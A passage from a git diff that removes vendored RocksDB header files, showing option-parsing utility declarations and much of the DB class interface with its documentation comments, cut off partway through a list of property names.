-//     should be set.
-// @param new_options the resulting options based on "base_options" with the
-//     change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_options" will be set to "base_options".
-Status GetColumnFamilyOptionsFromMap(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped = false,
-    bool ignore_unknown_options = false);
-
-// Take a default DBOptions "base_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
-// DBOptions "new_options".
-//
-// Below are the instructions of how to config some non-primitive-typed
-// options in DBOptions:
-//
-// * rate_limiter_bytes_per_sec:
-//   RateLimiter can be configured directly by specifying its bytes_per_sec.
-//   [Example]:
-//   - Passing {"rate_limiter_bytes_per_sec", "1024"} is equivalent to
-//     passing NewGenericRateLimiter(1024) to rate_limiter_bytes_per_sec.
-//
-// @param base_options the default options of the output "new_options".
-// @param opts_map an option name to value map for specifying how "new_options"
-//     should be set.
-// @param new_options the resulting options based on "base_options" with the
-//     change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_options" will be set to "base_options".
-Status GetDBOptionsFromMap(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped = false,
-    bool ignore_unknown_options = false);
-
-// Take a default BlockBasedTableOptions "table_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
-// BlockBasedTableOptions "new_table_options".
-//
-// Below are the instructions of how to config some non-primitive-typed
-// options in BlockBasedTableOptions:
-//
-// * filter_policy:
-//   We currently only support the following FilterPolicy in the convenience
-//   functions:
-//   - BloomFilter: use "bloomfilter:[bits_per_key]:[use_block_based_builder]"
-//     to specify BloomFilter.  The above string is equivalent to calling
-//     NewBloomFilterPolicy(bits_per_key, use_block_based_builder).
-//     [Example]:
-//     - Pass {"filter_policy", "bloomfilter:4:true"} in
-//       GetBlockBasedTableOptionsFromMap to use a BloomFilter with 4-bits
-//       per key and use_block_based_builder enabled.
-//
-// * block_cache / block_cache_compressed:
-//   We currently only support LRU cache in the GetOptions API.  The LRU
-//   cache can be set by directly specifying its size.
-//   [Example]:
-//   - Passing {"block_cache", "1M"} in GetBlockBasedTableOptionsFromMap is
-//     equivalent to setting block_cache using NewLRUCache(1024 * 1024).
-//
-// @param table_options the default options of the output "new_table_options".
-// @param opts_map an option name to value map for specifying how
-//     "new_table_options" should be set.
-// @param new_table_options the resulting options based on "table_options"
-//     with the change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_table_options" will be set to
-//     "table_options".
-Status GetBlockBasedTableOptionsFromMap(
-    const BlockBasedTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    BlockBasedTableOptions* new_table_options,
-    bool input_strings_escaped = false, bool ignore_unknown_options = false);
-
-// Take a default PlainTableOptions "table_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
-// PlainTableOptions "new_table_options".
-//
-// @param table_options the default options of the output "new_table_options".
-// @param opts_map an option name to value map for specifying how
-//     "new_table_options" should be set.
-// @param new_table_options the resulting options based on "table_options"
-//     with the change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_table_options" will be set to
-//     "table_options".
-Status GetPlainTableOptionsFromMap(
-    const PlainTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    PlainTableOptions* new_table_options, bool input_strings_escaped = false,
-    bool ignore_unknown_options = false);
-
-// Take a string representation of option names and  values, apply them into the
-// base_options, and return the new options as a result. The string has the
-// following format:
-//   "write_buffer_size=1024;max_write_buffer_number=2"
-// Nested options config is also possible. For example, you can define
-// BlockBasedTableOptions as part of the string for block-based table factory:
-//   "write_buffer_size=1024;block_based_table_factory={block_size=4k};"
-//   "max_write_buffer_num=2"
-Status GetColumnFamilyOptionsFromString(
-    const ColumnFamilyOptions& base_options,
-    const std::string& opts_str,
-    ColumnFamilyOptions* new_options);
-
-Status GetDBOptionsFromString(
-    const DBOptions& base_options,
-    const std::string& opts_str,
-    DBOptions* new_options);
-
-Status GetStringFromDBOptions(std::string* opts_str,
-                              const DBOptions& db_options,
-                              const std::string& delimiter = ";  ");
-
-Status GetStringFromColumnFamilyOptions(std::string* opts_str,
-                                        const ColumnFamilyOptions& cf_options,
-                                        const std::string& delimiter = ";  ");
-
-Status GetStringFromCompressionType(std::string* compression_str,
-                                    CompressionType compression_type);
-
-std::vector<CompressionType> GetSupportedCompressions();
-
-Status GetBlockBasedTableOptionsFromString(
-    const BlockBasedTableOptions& table_options,
-    const std::string& opts_str,
-    BlockBasedTableOptions* new_table_options);
-
-Status GetPlainTableOptionsFromString(
-    const PlainTableOptions& table_options,
-    const std::string& opts_str,
-    PlainTableOptions* new_table_options);
-
-Status GetMemTableRepFactoryFromString(
-    const std::string& opts_str,
-    std::unique_ptr<MemTableRepFactory>* new_mem_factory);
-
-Status GetOptionsFromString(const Options& base_options,
-                            const std::string& opts_str, Options* new_options);
-
-Status StringToMap(const std::string& opts_str,
-                   std::unordered_map<std::string, std::string>* opts_map);
-
-// Request stopping background work, if wait is true wait until it's done
-void CancelAllBackgroundWork(DB* db, bool wait = false);
-
-// Delete files which are entirely in the given range
-// Could leave some keys in the range which are in files which are not
-// entirely in the range.
-// Snapshots before the delete might not see the data in the given range.
-Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family,
-                          const Slice* begin, const Slice* end);
-
-// Verify the checksum of file
-Status VerifySstFileChecksum(const Options& options,
-                             const EnvOptions& env_options,
-                             const std::string& file_path);
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/db.h b/thirdparty/rocksdb/include/rocksdb/db.h
deleted file mode 100644
index 964f7b1..0000000
--- a/thirdparty/rocksdb/include/rocksdb/db.h
+++ /dev/null
@@ -1,1162 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_DB_H_
-#define STORAGE_ROCKSDB_INCLUDE_DB_H_
-
-#include <stdint.h>
-#include <stdio.h>
-#include <map>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "rocksdb/iterator.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/metadata.h"
-#include "rocksdb/options.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/sst_file_writer.h"
-#include "rocksdb/thread_status.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-#include "rocksdb/version.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef DeleteFile
-#endif
-
-#if defined(__GNUC__) || defined(__clang__)
-#define ROCKSDB_DEPRECATED_FUNC __attribute__((__deprecated__))
-#elif _WIN32
-#define ROCKSDB_DEPRECATED_FUNC __declspec(deprecated)
-#endif
-
-namespace rocksdb {
-
-struct Options;
-struct DBOptions;
-struct ColumnFamilyOptions;
-struct ReadOptions;
-struct WriteOptions;
-struct FlushOptions;
-struct CompactionOptions;
-struct CompactRangeOptions;
-struct TableProperties;
-struct ExternalSstFileInfo;
-class WriteBatch;
-class Env;
-class EventListener;
-
-using std::unique_ptr;
-
-extern const std::string kDefaultColumnFamilyName;
-struct ColumnFamilyDescriptor {
-  std::string name;
-  ColumnFamilyOptions options;
-  ColumnFamilyDescriptor()
-      : name(kDefaultColumnFamilyName), options(ColumnFamilyOptions()) {}
-  ColumnFamilyDescriptor(const std::string& _name,
-                         const ColumnFamilyOptions& _options)
-      : name(_name), options(_options) {}
-};
-
-class ColumnFamilyHandle {
- public:
-  virtual ~ColumnFamilyHandle() {}
-  // Returns the name of the column family associated with the current handle.
-  virtual const std::string& GetName() const = 0;
-  // Returns the ID of the column family associated with the current handle.
-  virtual uint32_t GetID() const = 0;
-  // Fills "*desc" with the up-to-date descriptor of the column family
-  // associated with this handle. Since it fills "*desc" with the up-to-date
-  // information, this call might internally lock and release DB mutex to
-  // access the up-to-date CF options.  In addition, all the pointer-typed
-  // options cannot be referenced any longer than the original options exist.
-  //
-  // Note that this function is not supported in RocksDBLite.
-  virtual Status GetDescriptor(ColumnFamilyDescriptor* desc) = 0;
-  // Returns the comparator of the column family associated with the
-  // current handle.
-  virtual const Comparator* GetComparator() const = 0;
-};
-
-static const int kMajorVersion = __ROCKSDB_MAJOR__;
-static const int kMinorVersion = __ROCKSDB_MINOR__;
-
-// A range of keys
-struct Range {
-  Slice start;          // Included in the range
-  Slice limit;          // Not included in the range
-
-  Range() { }
-  Range(const Slice& s, const Slice& l) : start(s), limit(l) { }
-};
-
-// A collections of table properties objects, where
-//  key: is the table's file name.
-//  value: the table properties object of the given table.
-typedef std::unordered_map<std::string, std::shared_ptr<const TableProperties>>
-    TablePropertiesCollection;
-
-// A DB is a persistent ordered map from keys to values.
-// A DB is safe for concurrent access from multiple threads without
-// any external synchronization.
-class DB {
- public:
-  // Open the database with the specified "name".
-  // Stores a pointer to a heap-allocated database in *dbptr and returns
-  // OK on success.
-  // Stores nullptr in *dbptr and returns a non-OK status on error.
-  // Caller should delete *dbptr when it is no longer needed.
-  static Status Open(const Options& options,
-                     const std::string& name,
-                     DB** dbptr);
-
-  // Open the database for read only. All DB interfaces
-  // that modify data, like put/delete, will return error.
-  // If the db is opened in read only mode, then no compactions
-  // will happen.
-  //
-  // Not supported in ROCKSDB_LITE, in which case the function will
-  // return Status::NotSupported.
-  static Status OpenForReadOnly(const Options& options,
-      const std::string& name, DB** dbptr,
-      bool error_if_log_file_exist = false);
-
-  // Open the database for read only with column families. When opening DB with
-  // read only, you can specify only a subset of column families in the
-  // database that should be opened. However, you always need to specify default
-  // column family. The default column family name is 'default' and it's stored
-  // in rocksdb::kDefaultColumnFamilyName
-  //
-  // Not supported in ROCKSDB_LITE, in which case the function will
-  // return Status::NotSupported.
-  static Status OpenForReadOnly(
-      const DBOptions& db_options, const std::string& name,
-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles, DB** dbptr,
-      bool error_if_log_file_exist = false);
-
-  // Open DB with column families.
-  // db_options specify database specific options
-  // column_families is the vector of all column families in the database,
-  // containing column family name and options. You need to open ALL column
-  // families in the database. To get the list of column families, you can use
-  // ListColumnFamilies(). Also, you can open only a subset of column families
-  // for read-only access.
-  // The default column family name is 'default' and it's stored
-  // in rocksdb::kDefaultColumnFamilyName.
-  // If everything is OK, handles will on return be the same size
-  // as column_families --- handles[i] will be a handle that you
-  // will use to operate on column family column_family[i].
-  // Before delete DB, you have to close All column families by calling
-  // DestroyColumnFamilyHandle() with all the handles.
-  static Status Open(const DBOptions& db_options, const std::string& name,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles, DB** dbptr);
-
-  // ListColumnFamilies will open the DB specified by argument name
-  // and return the list of all column families in that DB
-  // through column_families argument. The ordering of
-  // column families in column_families is unspecified.
-  static Status ListColumnFamilies(const DBOptions& db_options,
-                                   const std::string& name,
-                                   std::vector<std::string>* column_families);
-
-  DB() { }
-  virtual ~DB();
-
-  // Create a column_family and return the handle of column family
-  // through the argument handle.
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                                    const std::string& column_family_name,
-                                    ColumnFamilyHandle** handle);
-
-  // Bulk create column families with the same column family options.
-  // Return the handles of the column families through the argument handles.
-  // In case of error, the request may succeed partially, and handles will
-  // contain column family handles that it managed to create, and have size
-  // equal to the number of created column families.
-  virtual Status CreateColumnFamilies(
-      const ColumnFamilyOptions& options,
-      const std::vector<std::string>& column_family_names,
-      std::vector<ColumnFamilyHandle*>* handles);
-
-  // Bulk create column families.
-  // Return the handles of the column families through the argument handles.
-  // In case of error, the request may succeed partially, and handles will
-  // contain column family handles that it managed to create, and have size
-  // equal to the number of created column families.
-  virtual Status CreateColumnFamilies(
-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles);
-
-  // Drop a column family specified by column_family handle. This call
-  // only records a drop record in the manifest and prevents the column
-  // family from flushing and compacting.
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family);
-
-  // Bulk drop column families. This call only records drop records in the
-  // manifest and prevents the column families from flushing and compacting.
-  // In case of error, the request may succeed partially. User may call
-  // ListColumnFamilies to check the result.
-  virtual Status DropColumnFamilies(
-      const std::vector<ColumnFamilyHandle*>& column_families);
-
-  // Close a column family specified by column_family handle and destroy
-  // the column family handle specified to avoid double deletion. This call
-  // deletes the column family handle by default. Use this method to
-  // close column family instead of deleting column family handle directly
-  virtual Status DestroyColumnFamilyHandle(ColumnFamilyHandle* column_family);
-
-  // Set the database entry for "key" to "value".
-  // If "key" already exists, it will be overwritten.
-  // Returns OK on success, and a non-OK status on error.
-  // Note: consider setting options.sync = true.
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) = 0;
-  virtual Status Put(const WriteOptions& options, const Slice& key,
-                     const Slice& value) {
-    return Put(options, DefaultColumnFamily(), key, value);
-  }
-
-  // Remove the database entry (if any) for "key".  Returns OK on
-  // success, and a non-OK status on error.  It is not an error if "key"
-  // did not exist in the database.
-  // Note: consider setting options.sync = true.
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) = 0;
-  virtual Status Delete(const WriteOptions& options, const Slice& key) {
-    return Delete(options, DefaultColumnFamily(), key);
-  }
-
-  // Remove the database entry for "key". Requires that the key exists
-  // and was not overwritten. Returns OK on success, and a non-OK status
-  // on error.  It is not an error if "key" did not exist in the database.
-  //
-  // If a key is overwritten (by calling Put() multiple times), then the result
-  // of calling SingleDelete() on this key is undefined.  SingleDelete() only
-  // behaves correctly if there has been only one Put() for this key since the
-  // previous call to SingleDelete() for this key.
-  //
-  // This feature is currently an experimental performance optimization
-  // for a very specific workload.  It is up to the caller to ensure that
-  // SingleDelete is only used for a key that is not deleted using Delete() or
-  // written using Merge().  Mixing SingleDelete operations with Deletes and
-  // Merges can result in undefined behavior.
-  //
-  // Note: consider setting options.sync = true.
-  virtual Status SingleDelete(const WriteOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) = 0;
-  virtual Status SingleDelete(const WriteOptions& options, const Slice& key) {
-    return SingleDelete(options, DefaultColumnFamily(), key);
-  }
-
-  // Removes the database entries in the range ["begin_key", "end_key"), i.e.,
-  // including "begin_key" and excluding "end_key". Returns OK on success, and
-  // a non-OK status on error. It is not an error if no keys exist in the range
-  // ["begin_key", "end_key").
-  //
-  // This feature is currently an experimental performance optimization for
-  // deleting very large ranges of contiguous keys. Invoking it many times or on
-  // small ranges may severely degrade read performance; in particular, the
-  // resulting performance can be worse than calling Delete() for each key in
-  // the range. Note also the degraded read performance affects keys outside the
-  // deleted ranges, and affects database operations involving scans, like flush
-  // and compaction.
-  //
-  // Consider setting ReadOptions::ignore_range_deletions = true to speed
-  // up reads for key(s) that are known to be unaffected by range deletions.
-  virtual Status DeleteRange(const WriteOptions& options,
-                             ColumnFamilyHandle* column_family,
-                             const Slice& begin_key, const Slice& end_key);
-
-  // Merge the database entry for "key" with "value".  Returns OK on success,
-  // and a non-OK status on error. The semantics of this operation is
-  // determined by the user provided merge_operator when opening DB.
-  // Note: consider setting options.sync = true.
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) = 0;
-  virtual Status Merge(const WriteOptions& options, const Slice& key,
-                       const Slice& value) {
-    return Merge(options, DefaultColumnFamily(), key, value);
-  }
-
-  // Apply the specified updates to the database.
-  // If `updates` contains no update, WAL will still be synced if
-  // options.sync=true.
-  // Returns OK on success, non-OK on failure.
-  // Note: consider setting options.sync = true.
-  virtual Status Write(const WriteOptions& options, WriteBatch* updates) = 0;
-
-  // If the database contains an entry for "key" store the
-  // corresponding value in *value and return OK.
-  //
-  // If there is no entry for "key" leave *value unchanged and return
-  // a status for which Status::IsNotFound() returns true.
-  //
-  // May return some other Status on an error.
-  virtual inline Status Get(const ReadOptions& options,
-                            ColumnFamilyHandle* column_family, const Slice& key,
-                            std::string* value) {
-    assert(value != nullptr);
-    PinnableSlice pinnable_val(value);
-    assert(!pinnable_val.IsPinned());
-    auto s = Get(options, column_family, key, &pinnable_val);
-    if (s.ok() && pinnable_val.IsPinned()) {
-      value->assign(pinnable_val.data(), pinnable_val.size());
-    }  // else value is already assigned
-    return s;
-  }
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) = 0;
-  virtual Status Get(const ReadOptions& options, const Slice& key, std::string* value) {
-    return Get(options, DefaultColumnFamily(), key, value);
-  }
-
-  // If keys[i] does not exist in the database, then the i'th returned
-  // status will be one for which Status::IsNotFound() is true, and
-  // (*values)[i] will be set to some arbitrary value (often ""). Otherwise,
-  // the i'th returned status will have Status::ok() true, and (*values)[i]
-  // will store the value associated with keys[i].
-  //
-  // (*values) will always be resized to be the same size as (keys).
-  // Similarly, the number of returned statuses will be the number of keys.
-  // Note: keys will not be "de-duplicated". Duplicate keys will return
-  // duplicate values in order.
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys, std::vector<std::string>* values) = 0;
-  virtual std::vector<Status> MultiGet(const ReadOptions& options,
-                                       const std::vector<Slice>& keys,
-                                       std::vector<std::string>* values) {
-    return MultiGet(options, std::vector<ColumnFamilyHandle*>(
-                                 keys.size(), DefaultColumnFamily()),
-                    keys, values);
-  }
-
-  // If the key definitely does not exist in the database, then this method
-  // returns false, else true. If the caller wants to obtain value when the key
-  // is found in memory, a bool for 'value_found' must be passed. 'value_found'
-  // will be true on return if value has been set properly.
-  // This check is potentially lighter-weight than invoking DB::Get(). One way
-  // to make this lighter weight is to avoid doing any IOs.
-  // Default implementation here returns true and sets 'value_found' to false
-  virtual bool KeyMayExist(const ReadOptions& /*options*/,
-                           ColumnFamilyHandle* /*column_family*/,
-                           const Slice& /*key*/, std::string* /*value*/,
-                           bool* value_found = nullptr) {
-    if (value_found != nullptr) {
-      *value_found = false;
-    }
-    return true;
-  }
-  virtual bool KeyMayExist(const ReadOptions& options, const Slice& key,
-                           std::string* value, bool* value_found = nullptr) {
-    return KeyMayExist(options, DefaultColumnFamily(), key, value, value_found);
-  }
-
-  // Return a heap-allocated iterator over the contents of the database.
-  // The result of NewIterator() is initially invalid (caller must
-  // call one of the Seek methods on the iterator before using it).
-  //
-  // Caller should delete the iterator when it is no longer needed.
-  // The returned iterator should be deleted before this db is deleted.
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) = 0;
-  virtual Iterator* NewIterator(const ReadOptions& options) {
-    return NewIterator(options, DefaultColumnFamily());
-  }
-  // Returns iterators from a consistent database state across multiple
-  // column families. Iterators are heap allocated and need to be deleted
-  // before the db is deleted
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) = 0;
-
-  // Return a handle to the current DB state.  Iterators created with
-  // this handle will all observe a stable snapshot of the current DB
-  // state.  The caller must call ReleaseSnapshot(result) when the
-  // snapshot is no longer needed.
-  //
-  // nullptr will be returned if the DB fails to take a snapshot or does
-  // not support snapshot.
-  virtual const Snapshot* GetSnapshot() = 0;
-
-  // Release a previously acquired snapshot.  The caller must not
-  // use "snapshot" after this call.
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) = 0;
-
-#ifndef ROCKSDB_LITE
-  // Contains all valid property arguments for GetProperty().
-  //
-  // NOTE: Property names cannot end in numbers since those are interpreted as
-  //       arguments, e.g., see kNumFilesAtLevelPrefix.
-  struct Properties {
-    //  "rocksdb.num-files-at-level<N>" - returns string containing the number
-    //      of files at level <N>, where <N> is an ASCII representation of a
-    //      level number (e.g., "0").
-    static const std::string kNumFilesAtLevelPrefix;
-
-    //  "rocksdb.compression-ratio-at-level<N>" - returns string containing the
-    //      compression ratio of data at level <N>, where <N> is an ASCII
-    //      representation of a level number (e.g., "0"). Here, compression
-    //      ratio is defined as uncompressed data size / compressed file size.
-    //      Returns "-1.0" if no open files at level <N>.
-    static const std::string kCompressionRatioAtLevelPrefix;
-
-    //  "rocksdb.stats" - returns a multi-line string containing the data
-    //      described by kCFStats followed by the data described by kDBStats.
-    static const std::string kStats;
-
-    //  "rocksdb.sstables" - returns a multi-line string summarizing current
-    //      SST files.
-    static const std::string kSSTables;
-
-    //  "rocksdb.cfstats" - Both of "rocksdb.cfstats-no-file-histogram" and
-    //      "rocksdb.cf-file-histogram" together. See below for description
-    //      of the two.
-    static const std::string kCFStats;
-
-    //  "rocksdb.cfstats-no-file-histogram" - returns a multi-line string with
-    //      general columm family stats per-level over db's lifetime ("L<n>"),
-    //      aggregated over db's lifetime ("Sum"), and aggregated over the
-    //      interval since the last retrieval ("Int").
-    //  It could also be used to return the stats in the format of the map.
-    //  In this case there will a pair of string to array of double for
-    //  each level as well as for "Sum". "Int" stats will not be affected
-    //  when this form of stats are retrieved.
-    static const std::string kCFStatsNoFileHistogram;
-
-    //  "rocksdb.cf-file-histogram" - print out how many file reads to every
-    //      level, as well as the histogram of latency of single requests.
-    static const std::string kCFFileHistogram;
-
-    //  "rocksdb.dbstats" - returns a multi-line string with general database
-    //      stats, both cumulative (over the db's lifetime) and interval (since
-    //      the last retrieval of kDBStats).
-    static const std::string kDBStats;
-
-    //  "rocksdb.levelstats" - returns multi-line string containing the number
-    //      of files per level and total size of each level (MB).
-    static const std::string kLevelStats;
-
-    //  "rocksdb.num-immutable-mem-table" - returns number of immutable
-    //      memtables that have not yet been flushed.
-    static const std::string kNumImmutableMemTable;
-
-    //  "rocksdb.num-immutable-mem-table-flushed" - returns number of immutable
-    //      memtables that have already been flushed.
-    static const std::string kNumImmutableMemTableFlushed;
-
-    //  "rocksdb.mem-table-flush-pending" - returns 1 if a memtable flush is
-    //      pending; otherwise, returns 0.
-    static const std::string kMemTableFlushPending;
-
-    //  "rocksdb.num-running-flushes" - returns the number of currently running
-    //      flushes.
-    static const std::string kNumRunningFlushes;
-
-    //  "rocksdb.compaction-pending" - returns 1 if at least one compaction is
-    //      pending; otherwise, returns 0.
-    static const std::string kCompactionPending;
-
-    //  "rocksdb.num-running-compactions" - returns the number of currently
-    //      running compactions.
-    static const std::string kNumRunningCompactions;
-
-    //  "rocksdb.background-errors" - returns accumulated number of background
-    //      errors.
-    static const std::string kBackgroundErrors;
-
-    //  "rocksdb.cur-size-active-mem-table" - returns approximate size of active
-    //      memtable (bytes).
-    static const std::string kCurSizeActiveMemTable;
-
-    //  "rocksdb.cur-size-all-mem-tables" - returns approximate size of active
-    //      and unflushed immutable memtables (bytes).
-    static const std::string kCurSizeAllMemTables;
-
-    //  "rocksdb.size-all-mem-tables" - returns approximate size of active,
-    //      unflushed immutable, and pinned immutable memtables (bytes).
-    static const std::string kSizeAllMemTables;
-
-    //  "rocksdb.num-entries-active-mem-table" - returns total number of entries
-    //      in the active memtable.
-    static const std::string kNumEntriesActiveMemTable;
-
-    //  "rocksdb.num-entries-imm-mem-tables" - returns total number of entries
-    //      in the unflushed immutable memtables.
-    static const std::string kNumEntriesImmMemTables;
-
-    //  "rocksdb.num-deletes-active-mem-table" - returns total number of delete
-    //      entries in the active memtable.
-    static const std::string kNumDeletesActiveMemTable;
-
-    //  "rocksdb.num-deletes-imm-mem-tables" - returns total number of delete
-    //      entries in the unflushed immutable memtables.
-    static const std::string kNumDeletesImmMemTables;
-
-    //  "rocksdb.estimate-num-keys" - returns estimated number of total keys in
-    //      the active and unflushed immutable memtables and storage.
-    static const std::string kEstimateNumKeys;
-
-    //  "rocksdb.estimate-table-readers-mem" - returns estimated memory used for
-    //      reading SST tables, excluding memory used in block cache (e.g.,
-    //      filter and index blocks).
-    static const std::string kEstimateTableReadersMem;
-
-    //  "rocksdb.is-file-deletions-enabled" - returns 0 if deletion of obsolete
-    //      files is enabled; otherwise, returns a non-zero number.
-    static const std::string kIsFileDeletionsEnabled;
-
-    //  "rocksdb.num-snapshots" - returns number of unreleased snapshots of the
-    //      database.
-    static const std::string kNumSnapshots;
-
-    //  "rocksdb.oldest-snapshot-time" - returns number representing unix
-    //      timestamp of oldest unreleased snapshot.
-    static const std::string kOldestSnapshotTime;
-
-    //  "rocksdb.num-live-versions" - returns number of live versions. `Version`
-    //      is an internal data structure. See version_set.h for details. More
-    //      live versions often mean more SST files are held from being deleted,
-    //      by iterators or unfinished compactions.
-    static const std::string kNumLiveVersions;
-
-    //  "rocksdb.current-super-version-number" - returns number of current LSM
-    //  version. It is a uint64_t integer number, incremented after there is
-    //  any change to the LSM tree. The number is not preserved after restarting
-    //  the DB. After DB restart, it will start from 0 again.
-    static const std::string kCurrentSuperVersionNumber;
-
-    //  "rocksdb.estimate-live-data-size" - returns an estimate of the amount of
-    //      live data in bytes.
-    static const std::string kEstimateLiveDataSize;
-
-    //  "rocksdb.min-log-number-to-keep" - return the minimum log number of the
-    //      log files that should be kept.
-    static const std::string kMinLogNumberToKeep;
-
-    //  "rocksdb.total-sst-files-size" - returns total size (bytes) of all SST
-    //      files.
-    //  WARNING: may slow down online queries if there are too many files.
-    static const std::string kTotalSstFilesSize;
-
-    //  "rocksdb.base-level" - returns number of level to which L0 data will be
-    //      compacted.
-    static const std::string kBaseLevel;
-
-    //  "rocksdb.estimate-pending-compaction-bytes" - returns estimated total
-    //      number of bytes compaction needs to rewrite to get all levels down
-    //      to under target size. Not valid for other compactions than level-
-    //      based.
-    static const std::string kEstimatePendingCompactionBytes;
-
-    //  "rocksdb.aggregated-table-properties" - returns a string representation
-    //      of the aggregated table properties of the target column family.
-    static const std::string kAggregatedTableProperties;
-
-    //  "rocksdb.aggregated-table-properties-at-level<N>", same as the previous
-    //      one but only returns the aggregated table properties of the
-    //      specified level "N" at the target column family.
-    static const std::string kAggregatedTablePropertiesAtLevel;
-
-    //  "rocksdb.actual-delayed-write-rate" - returns the current actual delayed
-    //      write rate. 0 means no delay.
-    static const std::string kActualDelayedWriteRate;
-
-    //  "rocksdb.is-write-stopped" - Return 1 if write has been stopped.
-    static const std::string kIsWriteStopped;
-
-    //  "rocksdb.estimate-oldest-key-time" - returns an estimation of
-    //      oldest key timestamp in the DB. Currently only available for
-    //      FIFO compaction with
-    //      compaction_options_fifo.allow_compaction = false.
-    static const std::string kEstimateOldestKeyTime;
-  };
-#endif /* ROCKSDB_LITE */
-
-  // DB implementations can export properties about their state via this method.
-  // If "property" is a valid property understood by this DB implementation (see
-  // Properties struct above for valid options), fills "*value" with its current
-  // value and returns true.  Otherwise, returns false.
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) = 0;
-  virtual bool GetProperty(const Slice& property, std::string* value) {
-    return GetProperty(DefaultColumnFamily(), property, value);
-  }
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) = 0;
-  virtual bool GetMapProperty(const Slice& property,
-                              std::map<std::string, double>* value) {
-    return GetMapProperty(DefaultColumnFamily(), property, value);
-  }
-
-  // Similar to GetProperty(), but only works for a subset of properties whose
-  // return value is an integer. Return the value by integer. Supported
-  // properties:
-  //  "rocksdb.num-immutable-mem-table"
-  //  "rocksdb.mem-table-flush-pending"
-  //  "rocksdb.compaction-pending"
-  //  "rocksdb.background-errors"
-  //  "rocksdb.cur-size-active-mem-table"
-  //  "rocksdb.cur-size-all-mem-tables"
-  //  "rocksdb.size-all-mem-tables"
-  //  "rocksdb.num-entries-active-mem-table"
-  //  "rocksdb.num-entries-imm-mem-tables"
-  //  "rocksdb.num-deletes-active-mem-table"
-  //  "rocksdb.num-deletes-imm-mem-tables"
-  //  "rocksdb.estimate-num-keys"
-  //  "rocksdb.estimate-table-readers-mem"
-  //  "rocksdb.is-file-deletions-enabled"
-  //  "rocksdb.num-snapshots"
-  //  "rocksdb.oldest-snapshot-time"
-  //  "rocksdb.num-live-versions"
-  //  "rocksdb.current-super-version-number"
-  //  "rocksdb.estimate-live-data-size"
-  //  "rocksdb.min-log-number-to-keep"
-  //  "rocksdb.total-sst-files-size"
-  //  "rocksdb.base-level"
-  //  "rocksdb.estimate-pending-compaction-bytes"
-  //  "rocksdb.num-running-compactions"
